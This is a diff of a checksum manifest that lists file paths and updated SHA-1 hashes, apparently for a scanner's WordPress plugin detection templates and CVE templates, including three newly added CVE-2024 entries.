+helpers/wordpress/plugins/astra-sites.txt:1375dc6042d338e0d6b89174d9c404b7ebdae9cd helpers/wordpress/plugins/astra-widgets.txt:b210421abec0f36f79921c4cf586c321fb96deda helpers/wordpress/plugins/autoptimize.txt:0f766def7495524760bb6627fe20754b1b42201b -helpers/wordpress/plugins/backwpup.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 +helpers/wordpress/plugins/backwpup.txt:e0fb471c746352b4fc815f1991c6bf1bc6acc985 helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/better-wp-security.txt:3fe0b3c91b9dd2a6f57c0d1e7ec7c05ac3858661 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:c3c414dd549c09cb265d8cf95aef8445bf875384 @@ -968,7 +968,7 @@ helpers/wordpress/plugins/complianz-gdpr.txt:47c3ed69e5609d2452fff4d1fa775f2f0aa helpers/wordpress/plugins/contact-form-7-honeypot.txt:c7e3a41454e034e5ad994df8bf12b61e9fb1e1bc helpers/wordpress/plugins/contact-form-7.txt:df805429f6823d1d7321bcb6d64c21695e3fa92e helpers/wordpress/plugins/contact-form-cfdb7.txt:87d8ffba80ba87401ae94d97363f39c9ca8aa639 -helpers/wordpress/plugins/cookie-law-info.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 +helpers/wordpress/plugins/cookie-law-info.txt:237c8767860dc44f0f30057d25e9143e3d0b425f helpers/wordpress/plugins/cookie-notice.txt:066012e4b7acc72821475b5a73de68f5b025f9af helpers/wordpress/plugins/copy-delete-posts.txt:a777a6fb7b42f4ad070472db8c4a41dc6f1d1c5f helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 @@ -986,7 +986,7 @@ helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d036 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 -helpers/wordpress/plugins/elementor.txt:db88e39a3a3e96302cf700c7e417205d0a99fb3d +helpers/wordpress/plugins/elementor.txt:392fc913b5d49fa4c70eee9f60fe33e9e2412040 helpers/wordpress/plugins/elementskit-lite.txt:e533118608a55d6ab1d3699c600fc5c59213df36 helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:304dfea8281c49f77ad7dfa2a904794d3b8ddaa1 @@ -1002,7 +1002,7 @@ helpers/wordpress/plugins/fluentform.txt:32caf6abda6a7a1a799e1775e6c5b3e7e32ad59 helpers/wordpress/plugins/font-awesome.txt:24081282f3a9a62c341308c388d8ed137057665d helpers/wordpress/plugins/force-regenerate-thumbnails.txt:595d550379b2cb8bccb9659627308ff4e751d23f helpers/wordpress/plugins/formidable.txt:b6c0e7d7452f5f9a4d55e69c84c6f466553291cc -helpers/wordpress/plugins/forminator.txt:9a1c24d51092426f8323a8af495ce115d73c37af +helpers/wordpress/plugins/forminator.txt:84974fa4f98eecdaec4fce52ae2f9706dacdf087 helpers/wordpress/plugins/ga-google-analytics.txt:11df251d6e418ff4cb24b58e26a5d795212c603a helpers/wordpress/plugins/gdpr-cookie-compliance.txt:be824dd58040206228310471069ce04d3791ca6b helpers/wordpress/plugins/give.txt:3267c3fab452fc017e6985073337bca9bb999532 @@ -1030,7 +1030,7 @@ helpers/wordpress/plugins/insert-headers-and-footers.txt:53847c48faeb5e255ebcdd1 helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/intuitive-custom-post-order.txt:b0dcf3b058d1447f7795e1c1a95d9af3377f899d helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c -helpers/wordpress/plugins/jetpack-boost.txt:2760f23f36812b1f488df2ca1b312429d68b0f8e +helpers/wordpress/plugins/jetpack-boost.txt:4464e9f2e5e0cf52e9c26d3864e71249d73ea33a helpers/wordpress/plugins/jetpack.txt:686e3528babff806de1f1634899ad0543e550328 helpers/wordpress/plugins/kadence-blocks.txt:054dae9d64c38d76a066c981fbdab975b1abbf53 helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d @@ -1043,23 +1043,23 @@ helpers/wordpress/plugins/loginizer.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5 helpers/wordpress/plugins/loginpress.txt:5f022945150b402cb3e470acc3818847b3dc5e00 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:5f4a5c18721bec47a3562b0c38ed156cd2e91c0b -helpers/wordpress/plugins/mailpoet.txt:713afc477e35aa343e8d0dd831aa85fab6ba2e0f +helpers/wordpress/plugins/mailpoet.txt:e935235d3647d6ff94e208a06b4173d6d3f01134 helpers/wordpress/plugins/maintenance.txt:aa1cc400c8e8c75630f1392a15ed34d52e793a65 helpers/wordpress/plugins/mainwp-child.txt:4380b93c5f9e9e252ac9ac548449d65f955603c4 -helpers/wordpress/plugins/malcare-security.txt:f7693aa69d1a38f3b415822c60b85418a2499e8e +helpers/wordpress/plugins/malcare-security.txt:02a714807dae3cecb51caf2ebdace744f00866c3 helpers/wordpress/plugins/megamenu.txt:f85383fcd7c211714084d7fca897998d7d759c5d helpers/wordpress/plugins/members.txt:abe23e8d51de58b629ca74fce30438ee71509264 helpers/wordpress/plugins/meta-box.txt:14e90d2052196043a0c73a1d5d9e01bb9b905b02 helpers/wordpress/plugins/metform.txt:27e1606dc0a2a0c2fa59fc7f5fefdaeacc0b2794 helpers/wordpress/plugins/ml-slider.txt:9197d6d1f4e061a3a22d4ee7448b0fdbbc40c347 helpers/wordpress/plugins/newsletter.txt:7997f017232e3787b80ece3766f88ed86b1ee1ba -helpers/wordpress/plugins/nextend-facebook-connect.txt:76352622a937abb841a04340015012a42290add0 +helpers/wordpress/plugins/nextend-facebook-connect.txt:4ddf3a1e0a6b9d9c05f57b23f658e1113368aa4f helpers/wordpress/plugins/nextgen-gallery.txt:5d3c8a2aab67c1180ad6a53d03c70a9db8542e1a helpers/wordpress/plugins/ninja-forms.txt:470958dd9db82b472bd7ca29cb314b76859d78a9 helpers/wordpress/plugins/ocean-extra.txt:01b1c534c2db2eebe8eb41bca1f0ffc4193b0e3f helpers/wordpress/plugins/official-facebook-pixel.txt:9a0a06f6eb18bf496057acce15162dc100f43480 helpers/wordpress/plugins/one-click-demo-import.txt:3a8e01bbd716628be7b89f1ec085442592846654 -helpers/wordpress/plugins/optinmonster.txt:cc44575d6561ec2fa37929299963874b6093eccb +helpers/wordpress/plugins/optinmonster.txt:5d21a906e52ec03f80c5509bb9757af1612d0d0b helpers/wordpress/plugins/otter-blocks.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/password-protected.txt:c3c414dd549c09cb265d8cf95aef8445bf875384 helpers/wordpress/plugins/pdf-embedder.txt:7c48bf349bc02741cd6e5bf188ef8ecd52f2a60c @@ -1072,7 +1072,7 @@ helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef7 helpers/wordpress/plugins/popup-maker.txt:68c9b7f7107e58a492677237912410e7d28c994b helpers/wordpress/plugins/post-smtp.txt:c7fbb82e9737192fddd7338d925d8a95c11b44ac helpers/wordpress/plugins/post-types-order.txt:c83b2e9f55420fa41efd48e4a45103566c9e4767 -helpers/wordpress/plugins/premium-addons-for-elementor.txt:1fb7546d1b79064daf0793be1e470164e0d17d61 +helpers/wordpress/plugins/premium-addons-for-elementor.txt:d3a18f41754a906f180d659ec261e2e069e25d38 helpers/wordpress/plugins/pretty-link.txt:f58e78c3747eb34e2ebd81c71131b52fedc0ddee helpers/wordpress/plugins/really-simple-captcha.txt:ce0d88c5002b6cf7664052f1fc7d652cbdadccec helpers/wordpress/plugins/really-simple-ssl.txt:ef9896bae39c1e3999a9f105466cc1f7814021a7 @@ -1091,7 +1091,7 @@ helpers/wordpress/plugins/simple-history.txt:73b8603e920872b1a0062cf945de2d7b64e helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd helpers/wordpress/plugins/siteguard.txt:62c0d70e952578b13a6913ef9989b4ad0f8fa884 helpers/wordpress/plugins/siteorigin-panels.txt:ee64babdd7103f7b28c430a3fad844c6abf96b27 -helpers/wordpress/plugins/smart-slider-3.txt:ddd091c3f02b8a56a7a2d9a4a0f8387a12a347f9 +helpers/wordpress/plugins/smart-slider-3.txt:8e55c6f3001b1771361ae7fc955cc3a41018fa9e helpers/wordpress/plugins/so-widgets-bundle.txt:c26ccce86a0bfce71ba888599b4b24d41d3113d3 helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt:a9901643b6482a446e950927fd0e6f0e9fb01716 @@ -1099,7 +1099,7 @@ helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:6c75863a2a166b helpers/wordpress/plugins/sucuri-scanner.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d0362ed6 helpers/wordpress/plugins/svg-support.txt:ae33c65fc225aa9e6abd5e7fd96f6c9b2212353d helpers/wordpress/plugins/table-of-contents-plus.txt:e294506458a6ed4e350c049ae1bb095284c02285 -helpers/wordpress/plugins/tablepress.txt:fa6116a20acca977bccc47667ef17cf797887209 +helpers/wordpress/plugins/tablepress.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd helpers/wordpress/plugins/taxonomy-terms-order.txt:cd50e5150f44bd97a823ab2dd4155dd014f5f646 helpers/wordpress/plugins/templately.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/the-events-calendar.txt:274048f8c969245867e8093260c0bb68663be2a1 @@ -1125,7 +1125,7 @@ helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:689951386be6307f8517f9e3be818edaa6867ce0 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c helpers/wordpress/plugins/woocommerce-payments.txt:22be3fc15650fdcc411faabdac240c396bd5f146 -helpers/wordpress/plugins/woocommerce-paypal-payments.txt:40d69a31b1f9d238ca1c38a357e6846c514e2e9f +helpers/wordpress/plugins/woocommerce-paypal-payments.txt:b92754f576ff8ab413f69638772a7d4fb01e1de4 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:ff91f6a12c5b5d9b3000e730864aa8f2141aa975 helpers/wordpress/plugins/woocommerce-services.txt:8833d6b9ff65739ec437d2754b9fc885e202a555 helpers/wordpress/plugins/woocommerce.txt:3fe0b3c91b9dd2a6f57c0d1e7ec7c05ac3858661 @@ -1137,7 +1137,7 @@ helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/wp-crontrol.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/wp-fastest-cache.txt:ccefc2f8651dab1dca3f5569d5c8495d75f8956a helpers/wordpress/plugins/wp-file-manager.txt:db63fca627057d07dbd8d5064a623a9cd31006f9 -helpers/wordpress/plugins/wp-google-maps.txt:cfea9428a1a199afcd685b96a20598b45fd3507c +helpers/wordpress/plugins/wp-google-maps.txt:7abf4deda3842d92ece171fc3e4f4d822495a725 helpers/wordpress/plugins/wp-mail-logging.txt:8fd8331f772b1227e5913d3649cdb93d928aaebf helpers/wordpress/plugins/wp-mail-smtp.txt:3ba1cdcd02c8fe15ffff21ff0cb646a3324830ca helpers/wordpress/plugins/wp-maintenance-mode.txt:b0f827f6588ea6305e79126fa44e3fda7f178356 @@ -1849,9 +1849,9 @@ http/cves/2018/CVE-2018-6200.yaml:3e6473129d625093af721e2e6cac53ac702aa99c http/cves/2018/CVE-2018-6530.yaml:c9f5fd5828e6825e4e2429b612b21820ef7e8e48 http/cves/2018/CVE-2018-6605.yaml:4c52ab31c5528441d5cdb88b6da9eee6ee7197e0 http/cves/2018/CVE-2018-6910.yaml:1662c242773d5c5b17b063fd3f30a958c575b8bd -http/cves/2018/CVE-2018-7192.yaml:a1e40dfc4020146019c1badc2740c05c247e4ef9 -http/cves/2018/CVE-2018-7193.yaml:fd7af1eb0aa46d5a40e0ed0cad16cb8094b756ec -http/cves/2018/CVE-2018-7196.yaml:8393faa790aa1a994410bb3f0c499342357bb68c +http/cves/2018/CVE-2018-7192.yaml:56c2e46e37828e8b47e8556bdb555a689fe923f8 +http/cves/2018/CVE-2018-7193.yaml:fd5986d55ce81a723472f363e7830935e885132b +http/cves/2018/CVE-2018-7196.yaml:f429202bd8cd7b3c55a17c31ab4aef9cceb5e871 http/cves/2018/CVE-2018-7251.yaml:35bdb470f05dec3b89486bd31a38d23be7d85346 http/cves/2018/CVE-2018-7282.yaml:be0c74b3dbba955d79d30c81b2fdc9e89502a91b http/cves/2018/CVE-2018-7314.yaml:dfed8b8206e6720d6d51363adc96f9ba89368e76 @@ -3246,8 +3246,8 @@ http/cves/2023/CVE-2023-1080.yaml:57fd2d5ede5e09e53ef5c560add050d334ba9b09 http/cves/2023/CVE-2023-1177.yaml:ab4b55e867e4a8f730b51207ffea03e8053bf1d1 http/cves/2023/CVE-2023-1263.yaml:954755ea23eaab8dbf35c5b53d78ae5642ac7c11 http/cves/2023/CVE-2023-1315.yaml:2178e336e062101eb8b803c9d4623a65d90ac012 -http/cves/2023/CVE-2023-1317.yaml:593e1fcb9cc046a13cebccb50131238ae296e3d9 -http/cves/2023/CVE-2023-1318.yaml:0d0831a4d460eb10cf00c23d73899fc2be19f222 +http/cves/2023/CVE-2023-1317.yaml:bc90b04475017347f029200a10707ee655152170 +http/cves/2023/CVE-2023-1318.yaml:ea3c10e7f03f90e250dce9dbff027f5b0617a510 http/cves/2023/CVE-2023-1362.yaml:6e432a7601e15e3e50f24c19ef101f6395404113 http/cves/2023/CVE-2023-1408.yaml:2c3e73f4296c1f9606b8e377436ebdbfe1f715e2 http/cves/2023/CVE-2023-1434.yaml:93e41771aad3b211bd99c40258acee718147332a @@ -3757,6 +3757,9 @@ http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74 http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c http/cves/2024/CVE-2024-32709.yaml:de0592811b331a6594fdf4e4b4f4539766ad0ade http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00 +http/cves/2024/CVE-2024-32735.yaml:d363899f99a4dec9b609cbbf9e9cc7e10f1376b4 +http/cves/2024/CVE-2024-32736.yaml:6d6ddae0457fcd129b2fc3ad7df24a4e39a4edf1 +http/cves/2024/CVE-2024-32737.yaml:b3a7a503bd4f1a789e32b432926c1aa633e1e67a http/cves/2024/CVE-2024-3274.yaml:578789e5289c27456c8a66f9bde8d1160c615d34 http/cves/2024/CVE-2024-32964.yaml:f1b5908a6cd0bb367fea33497ae979a9bfae2966 http/cves/2024/CVE-2024-33113.yaml:64a8f2a506f72757a112f312214c4880021b99bb @@ -7834,236 +7837,236 @@ http/technologies/windows-communication-foundation-detect.yaml:b52558d968a07f23d http/technologies/wing-ftp-service-detect.yaml:92a8c8080c423ecdbe008bff39e4363d22ce995f http/technologies/wms-server-detect.yaml:5b24766a9022a18cc343b60f0381f69ce70a0b4d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:c64a3dafb1010a0e55bef14380a0da5bfa47d18d -http/technologies/wordpress/plugins/add-to-any.yaml:8acea129ef4e726306eeb56949360a1c931dbb97 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8ecd62b3f840674f1fad8b2ac7489ba40fa127cb +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9b0d61fdb0555880a3372953e6c637b0ac927374 -http/technologies/wordpress/plugins/akismet.yaml:b4ac0a68877b2edf3ad2af60599d332a8d07dbe2 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:3d9f47877f12c2c3e1e8243e41043bb3c568ba7a +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:5215a237dcfa09d212f34fb4d080dda96e8a3f4b -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4b3b0006e8e4564f8e84c2c91b7cae97c3991bff -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0208a24793313bd5b3f92a6fc14bfdf8fda65da3 -http/technologies/wordpress/plugins/amp.yaml:3446ac6a6d633b247c2f317c865f1b33d052ac48 -http/technologies/wordpress/plugins/antispam-bee.yaml:093505a998664ef4fc424d774f24669e3c3d0e72 -http/technologies/wordpress/plugins/astra-sites.yaml:f1736177761e9812da97a20d18539031612b9b22 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:ab66bfa68427304977ae87c9845deba134145312 -http/technologies/wordpress/plugins/backwpup.yaml:2d5eef3ceb4b03e71caf99fd4d1579e453d0dfc8 -http/technologies/wordpress/plugins/better-search-replace.yaml:232a307fa5fa6d6e5aa6ac757dbf76a695887aee -http/technologies/wordpress/plugins/better-wp-security.yaml:d89a6c1b61bcd129f5fa0d7b0c92beca11c4d44d -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:003ff3b23227b4060bf0d1d0e136ffaa17316e84 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0feac541ed903c055f02064330ffe835ccfe0a79 -http/technologies/wordpress/plugins/breeze.yaml:30bceaaeb9c11cbcb1e734c2a0f1d5d9a00009e8 -http/technologies/wordpress/plugins/broken-link-checker.yaml:fce4adc0391035abb5ea8c39ff407fed7ca92098 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf http/technologies/wordpress/plugins/burst-statistics.yaml:8ae381b1138e0ed2a3121f84c7e14d33a6d6ed8a -http/technologies/wordpress/plugins/chaty.yaml:81a298597d02a8236f3ddb120dc9b3663e0e5603 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:04404933f9c235a3f61a9bc13e29fd464dae2d28 -http/technologies/wordpress/plugins/classic-editor.yaml:bb34485e00cb44b409e4b37ec6f14814d73b88e5 -http/technologies/wordpress/plugins/classic-widgets.yaml:9f7292286056b556aea8f2ad95b3da01dd984d92 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:c85228420bc29987be39cf69a67f43905d710055 +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:75f3de25f3d179b710c7a2cf9df1cb3acae55f11 -http/technologies/wordpress/plugins/coblocks.yaml:1a66fccfb34dc78cb9f75bf0e4aeb3cef828c675 -http/technologies/wordpress/plugins/code-snippets.yaml:cb599d120f30f06584bd79ea5fad15a565d8e4e7 -http/technologies/wordpress/plugins/coming-soon.yaml:d2a9dbb377a0d7f783c24dd7852d0bd70edaecec -http/technologies/wordpress/plugins/complianz-gdpr.yaml:3e83e128f827976ba92f9575e5195ded561d240c -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:9ffd89bbd597d3e2c283181937036f7005580847 -http/technologies/wordpress/plugins/contact-form-7.yaml:7a19a91da99d5e946333fce63f94349ed3bb4322 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:f32965a58cd1d2bd4f414130f6df0a2df8c5c11a -http/technologies/wordpress/plugins/cookie-law-info.yaml:a945ad49c5b4cc36f4df6bcf4ff70c9c02f93474 -http/technologies/wordpress/plugins/cookie-notice.yaml:a2c308c87755bbecdcc7655c9b33abae46e6ba84 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:9c60d32ef2d348273079b45ca080df83eb3fdc4c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:b3456f97481e327530af7d06e560bcae8eabcd2c -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:6f6cde87dc04404571e1995fc490349d77d62d4c -http/technologies/wordpress/plugins/custom-css-js.yaml:b0d33711bf680947528f648a5ad043e6ce94cec9 -http/technologies/wordpress/plugins/custom-fonts.yaml:093a948ad5b3d4e66f25156b04639a9360e8ff4e -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:b10ab875daa3de49b5ffdeb7eba57677d75ad924 -http/technologies/wordpress/plugins/disable-comments.yaml:4de0ba55a2140c9184b89f839745d5e22aa0f2c3 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:9ed12e02dc945a34711dca93da0857b06b7564e0 -http/technologies/wordpress/plugins/duplicate-page.yaml:1d32ba5e6a542dfb1c0a1fae51397dac14e53ed0 -http/technologies/wordpress/plugins/duplicate-post.yaml:3b9cb97b1374ac61f173c023bb6735b7895dff02 -http/technologies/wordpress/plugins/duplicator.yaml:093f8b9cd63c7908b47de67f8d058d58beceae90 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:11f8741522073c0d0e0e5fcedb7134d429738857 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:02b01785c66dee2c06b91fd257f5ea08b8d557c6 +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:85ed4754232635fa21a85b407d4cff31d35387c9 +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:ef6ba1fa02dd55922c12479a48ad1069ebd32256 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2efac711f7bcc25ee3b38fd5033ab9b957b7697c -http/technologies/wordpress/plugins/elementor.yaml:ef86ac403aaa7e85f67156e70f3f846f5529caaf -http/technologies/wordpress/plugins/elementskit-lite.yaml:81661b1a180495c3c66d0212e5bc1f5d90120430 -http/technologies/wordpress/plugins/enable-media-replace.yaml:96aa965665f7e180498f75aa71b7cf934e82d8f4 -http/technologies/wordpress/plugins/envato-elements.yaml:8480fd73ee1805881849abeb7a60b0868de014e1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:9381557e80a5711bd3ad6ef728c0d8c55ddb8316 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:d1bc53f814cdca57c36eb1e850875510b17a8c60 -http/technologies/wordpress/plugins/extendify.yaml:2b342c5647c8698896ef72788ee176d05a459f5a -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:ebd0c4c43a2bad99242767bcbd2d340667a7dfd6 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:e58f07577fcf3f356cf52b90f2b7c736abb4b404 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:78b3c78912cbdc4c8349bef72fd8fd6fa24beb21 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:022f518e7d49f749cbf45a0e81c4bcdc60f7e758 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/extendify.yaml:16df61d6c1c08c47ee240cf33df07fd008bc0a27 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:55febd7249bb43dd05cf5bcc2c096b11ed2dd2f9 -http/technologies/wordpress/plugins/flamingo.yaml:eba545e10dc17bf382fe6929d293411ce2d98eb3 -http/technologies/wordpress/plugins/fluent-smtp.yaml:adcc28c9e10f4386eee1477b0385ff55ffef249a -http/technologies/wordpress/plugins/fluentform.yaml:a1d2e68fd05fd94ba1adc33823530d6cb0fe279a -http/technologies/wordpress/plugins/font-awesome.yaml:5f9aea8eade06373737c21fa8a96d6c32d68013b 